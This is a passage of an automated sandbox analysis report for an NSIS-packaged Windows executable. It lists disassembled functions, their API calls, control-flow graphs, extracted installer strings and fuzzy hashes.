                                                          • lstrcmpiW.KERNEL32(008560C8,0084E0B8,008560C8,~nsu.tmp), ref: 00403B1F
                                                          • CreateDirectoryW.KERNEL32(008560C8,00000000), ref: 00403B2B
                                                          • SetCurrentDirectoryW.KERNEL32(008560C8), ref: 00403B32
                                                          • DeleteFileW.KERNEL32(007B1A20,007B1A20,?,007F6008,00409204,007F2000,?), ref: 00403B83
                                                          • CopyFileW.KERNEL32(0085E0D8,007B1A20,00000001), ref: 00403B97
                                                          • CloseHandle.KERNEL32(00000000,007B1A20,007B1A20,?,007B1A20,00000000), ref: 00403BC4
                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C1A
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                          • API String ID: 2435955865-3712954417
                                                          • Opcode ID: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
                                                          • Instruction ID: 930d0106ac8f21ffe7c218431e73a7c1b7ebb2f3f08f251653cedcfd3481038f
                                                          • Opcode Fuzzy Hash: 51e6cc7ce2c8c92eb188c52ce46338fcab122280fa7631c11b5295fa70478681
                                                          • Instruction Fuzzy Hash: 67A1E6B1540301AAD720BF619D0AE2B3EACEF50745F15483FF582B61D2DBBD89448B6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 475 406312-406328 GetModuleHandleA 476 406335-40633d GetProcAddress 475->476 477 40632a-406333 LoadLibraryA 475->477 478 406343-406345 476->478 477->476 477->478
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction ID: 74a8a5aaaf3dd8a694d56da61a16f6303afc7614e5bdd8def9870afc0854d2e9
                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                          • Instruction Fuzzy Hash: BCD0123120011597D6001B65AE0895F776CEFA5611707803EF942F3131FB34D515A6EC

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 496 4062eb-4062ff FindFirstFileW 497 406301-40630a FindClose 496->497 498 40630c 496->498 499 40630e-40630f 497->499 498->499
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,007DA700,007D5AF8,004067E4,007D5AF8), ref: 004062F6
                                                          • FindClose.KERNEL32(00000000), ref: 00406302
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
                                                          • Instruction ID: 5e506215f2711f0e24a615dbcf2ef03c94eb3d964d91be164e4c0db9e35754d2
                                                          • Opcode Fuzzy Hash: cfe9f0376b8c8cff23c30bcc19c0e48e947267a495800e31c530dd607e3cc84c
                                                          • Instruction Fuzzy Hash: 80D012315141206FD34017386E4C88B7A68AF063303314B36F4A6F12E0C634CC3786ED

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 3 4030ee-4030f2 1->3 4 401601-401611 call 4062b9 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062b9 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062b9 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062b9 call 405d6f 2->10 11 401672-401686 call 40145c call 4062b9 2->11 12 401693-4016ac call 401446 call 4062b9 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062b9 call 404f88 2->14 15 4016d6-4016db 2->15 16 401736-4030de call 405f67 2->16 17 401897-4018a7 call 40145c call 4062eb 2->17 18 4018db-401910 call 40145c * 3 call 4062b9 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062b9 SetForegroundWindow 2->20 4->3 37 401751-401755 ShowWindow 5->37 38 401758-40175f 5->38 58 4019a3-4019a8 6->58 59 40197f-401984 6->59 7->1 64 4019ec-4019f8 7->64 8->1 78 40179a-4017a6 call 4062b9 8->78 89 40166d 9->89 102 401864-40186c 10->102 103 4017de-4017fc call 405d1c CreateDirectoryW 10->103 79 401689-40168e call 404f88 11->79 84 4016b1-4016b8 Sleep 12->84 85 4016ae-4016b0 12->85 13->3 34 401632-401637 14->34 32 401702-401710 15->32 33 4016dd-4016fd call 401446 15->33 16->1 80 4018c2-4018d6 call 4062b9 17->80 81 4018a9-4018bd call 4062b9 17->81 112 401912-401919 18->112 113 40191e-401921 18->113 19->34 35 401647-40164e PostQuitMessage 19->35 20->1 32->1 33->1 34->3 35->34 37->38 38->1 54 401765-401769 ShowWindow 38->54 54->1 71 4019af-4019b2 58->71 70 401986-401989 59->70 59->71 64->1 70->71 82 40198b-401993 call 4062eb 70->82 71->1 86 4019b8-4019c5 GetShortPathNameW 71->86 97 4017ab-4017ac 78->97 79->1 80->3 81->3 82->58 105 401995-4019a1 call 40601f 82->105 84->1 85->84 86->1 89->3 97->1 108 401890-401892 102->108 109 40186e-40188b call 404f88 call 40601f SetCurrentDirectoryW 102->109 117 401846-40184e call 4062b9 103->117 118 4017fe-401809 GetLastError 103->118 105->71 108->79 109->1 112->79 119 401923-40192b call 4062eb 113->119 120 40194a-401950 113->120 132 401853-401854 117->132 123 401827-401832 GetFileAttributesW 118->123 124 40180b-401825 GetLastError call 4062b9 118->124 119->120 137 40192d-401948 call 406c7e call 404f88 119->137 122 401957-40195d call 4062b9 120->122 122->97 130 401834-401844 call 4062b9 123->130 131 401855-40185e 123->131 124->131 130->132 131->102 131->103 132->131 137->122
                                                          APIs
                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                          • ShowWindow.USER32(?), ref: 00401753
                                                          • ShowWindow.USER32(?), ref: 00401767
                                                          • SetFileAttributesW.KERNEL32(00000000,?), ref: 0040178C
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0), ref: 004017F4
                                                          • GetLastError.KERNEL32(?,?,000000F0), ref: 004017FE
                                                          • GetLastError.KERNEL32(?,?,000000F0), ref: 0040180B
                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0), ref: 0040182A
                                                          • SetCurrentDirectoryW.KERNELBASE(?,0084A0B0,?,000000E6,0040F0D0,?,?,?,000000F0), ref: 00401885
                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                          Strings
                                                          • Call: %d, xrefs: 0040165A
                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                          • Sleep(%d), xrefs: 0040169D
                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                          • detailprint: %s, xrefs: 00401679
                                                          • Rename: %s, xrefs: 004018F8
                                                          • Rename on reboot: %s, xrefs: 00401943
                                                          • Jump: %d, xrefs: 00401602
                                                          • BringToFront, xrefs: 004016BD
                                                          • Rename failed: %s, xrefs: 0040194B
                                                          • Aborting: "%s", xrefs: 0040161D
                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                          • API String ID: 2872004960-3619442763
                                                          • Opcode ID: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
                                                          • Instruction ID: 748122a4b1e4c8b0444bddd0dc60868c48b22d194fcfef730b64eaf2fe916135
                                                          • Opcode Fuzzy Hash: 99a3929af74f4417753e4645e0c6c0516a132660515c9950466baffe7fed2d18
                                                          • Instruction Fuzzy Hash: 3CB1D172A01204EFDB107FA1DD459AE3B78EF05354B25817FF942B62E1DA3D8A40CA6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 264 405942-40595a call 406312 267 40595c-40596c call 405f67 264->267 268 40596e-4059a6 call 405ee9 264->268 277 4059c9-4059f2 call 403eab call 406794 267->277 273 4059a8-4059b9 call 405ee9 268->273 274 4059be-4059c4 lstrcatW 268->274 273->274 274->277 282 405a86-405a8e call 406794 277->282 283 4059f8-4059fd 277->283 289 405a90-405a97 call 40681b 282->289 290 405a9c-405aa3 282->290 283->282 284 405a03-405a2b call 405ee9 283->284 284->282 291 405a2d-405a31 284->291 289->290 293 405aa5-405aab 290->293 294 405abc-405ae1 LoadImageW 290->294 295 405a33-405a42 call 405d1c 291->295 296 405a45-405a51 lstrlenW 291->296 293->294 297 405aad-405ab2 call 403e8a 293->297 298 405ae7-405b29 RegisterClassW 294->298 299 405b7c-405b84 call 40141d 294->299 295->296 304 405a53-405a61 lstrcmpiW 296->304 305 405a79-405a81 call 406738 call 40601f 296->305 297->294 300 405c4b 298->300 301 405b2f-405b77 SystemParametersInfoW CreateWindowExW 298->301 314 405b86-405b89 299->314 315 405b8e-405b99 call 403eab 299->315 310 405c4d-405c54 300->310 301->299 304->305 311 405a63-405a6d GetFileAttributesW 304->311 305->282 316 405a73-405a74 call 406767 311->316 317 405a6f-405a71 311->317 314->310 322 405c22-405c2a call 40505d 315->322 323 405b9f-405bbc ShowWindow LoadLibraryW 315->323 316->305 317->305 317->316 330 405c44-405c46 call 40141d 322->330 331 405c2c-405c32 322->331 325 405bc5-405bd7 GetClassInfoW 323->325 326 405bbe-405bc3 LoadLibraryW 323->326 328 405bd9-405be9 GetClassInfoW RegisterClassW 325->328 329 405bef-405c20 DialogBoxParamW call 40141d call 403c7e 325->329 326->325 328->329 329->310 330->300 331->314 333 405c38-405c3f call 40141d 331->333 333->314
                                                          APIs
                                                            • Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
                                                            • Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
                                                            • Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D
                                                          • lstrcatW.KERNEL32(008520C0,007C5A78), ref: 004059C4
                                                          • lstrlenW.KERNEL32(007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000,00000006,008420A0), ref: 00405A46
                                                          • lstrcmpiW.KERNEL32(007E0D58,.exe,007E0D60,?,?,?,007E0D60,00000000,008460A8,008520C0,007C5A78,80000001,Control Panel\Desktop\ResourceLocale,00000000,007C5A78,00000000), ref: 00405A59
                                                          • GetFileAttributesW.KERNEL32(007E0D60), ref: 00405A64
                                                            • Part of subcall function 00405F67: wsprintfW.USER32 ref: 00405F74
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,008460A8), ref: 00405ACD
                                                          • RegisterClassW.USER32(007E9580), ref: 00405B20
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B38
                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B71
                                                            • Part of subcall function 00403EAB: SetWindowTextW.USER32(00000000,007E95E0), ref: 00403F46
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BA7
                                                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BB8
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BC3
                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,007E9580), ref: 00405BD3
                                                          • GetClassInfoW.USER32(00000000,RichEdit,007E9580), ref: 00405BE0
                                                          • RegisterClassW.USER32(007E9580), ref: 00405BE9
                                                          • DialogBoxParamW.USER32(?,00000000,0040548F,00000000), ref: 00405C08
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`~$b~$xZ|
                                                          • API String ID: 608394941-1309837594
                                                          • Opcode ID: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
                                                          • Instruction ID: f5a039cb880b9eaee1ecdf0536d3c824aabf016c99065ad96b2918c6fc8c0824
                                                          • Opcode Fuzzy Hash: 9f9051f305b5981edc045e04f38835ab473d85c7b7bbd9c3773303b1f27117da
                                                          • Instruction Fuzzy Hash: 0A718071600605AED710ABA5AD85E3B37ACEB84748F00413EF941B62E2DB7C5C51CE6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 340 40359d-4035eb GetTickCount GetModuleFileNameW call 405e66 343 4035f7-403625 call 40601f call 406767 call 40601f GetFileSize 340->343 344 4035ed-4035f2 340->344 352 403712-403720 call 4032d2 343->352 353 40362b 343->353 345 4037cc-4037d0 344->345 359 403726-403729 352->359 360 4037db-4037e0 352->360 354 403630-403647 353->354 357 403649 354->357 358 40364b-40364d call 403336 354->358 357->358 364 403652-403654 358->364 362 403755-40377f GlobalAlloc call 403368 call 40337f 359->362 363 40372b-403743 call 403368 call 403336 359->363 360->345 362->360 391 403781-403792 362->391 363->360 386 403749-40374f 363->386 366 4037d3-4037da call 4032d2 364->366 367 40365a-403661 364->367 366->360 371 403663-403677 call 405e22 367->371 372 4036dd-4036e1 367->372 376 4036eb-4036f1 371->376 389 403679-403680 371->389 375 4036e3-4036ea call 4032d2 372->375 372->376 375->376 382 403700-40370a 376->382 383 4036f3-4036fd call 407297 376->383 382->354 390 403710 382->390 383->382 386->360 386->362 389->376 393 403682-403689 389->393 390->352 394 403794 391->394 395 40379a-40379d 391->395 393->376 397 40368b-403692 393->397 394->395 396 4037a0-4037a8 395->396 396->396 398 4037aa-4037c5 SetFilePointer call 405e22 396->398 397->376 399 403694-40369b 397->399 403 4037ca 398->403 399->376 401 40369d-4036bd 399->401 401->360 402 4036c3-4036c7 401->402 404 4036c9-4036cd 402->404 405 4036cf-4036d7 402->405 403->345 404->390 404->405 405->376 406 4036d9-4036db 405->406 406->376
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004035AE
                                                          • GetModuleFileNameW.KERNEL32(00000000,0085E0D8,00002004,?,?,?,00000000,00403A5D,?), ref: 004035CA
                                                            • Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                            • Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          • GetFileSize.KERNEL32(00000000,00000000,008620E0,00000000,0084E0B8,0084E0B8,0085E0D8,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00403616
                                                          Strings
                                                          • soft, xrefs: 0040368B
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037DB
                                                          • Null, xrefs: 00403694
                                                          • Error launching installer, xrefs: 004035ED
                                                          • Inst, xrefs: 00403682
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 4283519449-527102705
                                                          • Opcode ID: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
                                                          • Instruction ID: 2d5e6ab7a624250aa0c4fc4e0edfbfc1f0b135b6de304195c1858c8edc22daf3
                                                          • Opcode Fuzzy Hash: 3615432da17c87c71a0cb76411668bd17e8426081a6d24985fa15272c6dca85e
                                                          • Instruction Fuzzy Hash: A151B5B1900204ABDB209F65DD85BAE7FACEB04756F14853BEA00B72D1D73D9A44CB5C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 407 40337f-403398 408 4033a1-4033a9 407->408 409 40339a 407->409 410 4033b2-4033b7 408->410 411 4033ab 408->411 409->408 412 4033c7-4033d4 call 403336 410->412 413 4033b9-4033c2 call 403368 410->413 411->410 417 4033d6 412->417 418 4033de-4033e5 412->418 413->412 419 4033d8-4033d9 417->419 420 403529-40352b 418->420 421 4033eb-40340e GetTickCount 418->421 424 403596-40359a 419->424 422 403579-40357c 420->422 423 40352d-403530 420->423 425 403593 421->425 426 403414 421->426 427 403581-40358a call 403336 422->427 428 40357e 422->428 423->425 429 403532 423->429 425->424 430 403419-403421 426->430 427->417 439 403590 427->439 428->427 432 403537-40353d 429->432 433 403423 430->433 434 403426-40342f call 403336 430->434 436 403542-40354b call 403336 432->436 437 40353f 432->437 433->434 434->417 443 403431-40343a 434->443 436->417 444 403551-403564 WriteFile 436->444 437->436 439->425 445 403440-403460 call 40744b 443->445 447 403522-403524 444->447 448 403566-403569 444->448 451 403466-40347d GetTickCount 445->451 452 40351b-40351d 445->452 447->419 448->447 450 40356b-403575 448->450 450->432 453 403577 450->453 454 4034c8-4034cc 451->454 455 40347f-403487 451->455 452->419 453->425 458 403510-403513 454->458 459 4034ce-4034d1 454->459 456 403489-40348d 455->456 457 40348f-4034c5 MulDiv wsprintfW call 404f88 455->457 456->454 456->457 457->454 458->430 460 403519 458->460 462 4034f3-4034fe 459->462 463 4034d3-4034e7 WriteFile 459->463 460->425 466 403501-403505 462->466 463->447 465 4034e9-4034ec 463->465 465->447 467 4034ee-4034f1 465->467 466->445 468 40350b 466->468 467->466 468->425
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004033EB
                                                          • GetTickCount.KERNEL32 ref: 0040346E
                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040349B
                                                          • wsprintfW.USER32 ref: 004034AE
                                                          • WriteFile.KERNELBASE(00000000,00000000,00427150,0040377C,00000000), ref: 004034DF
                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040355C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
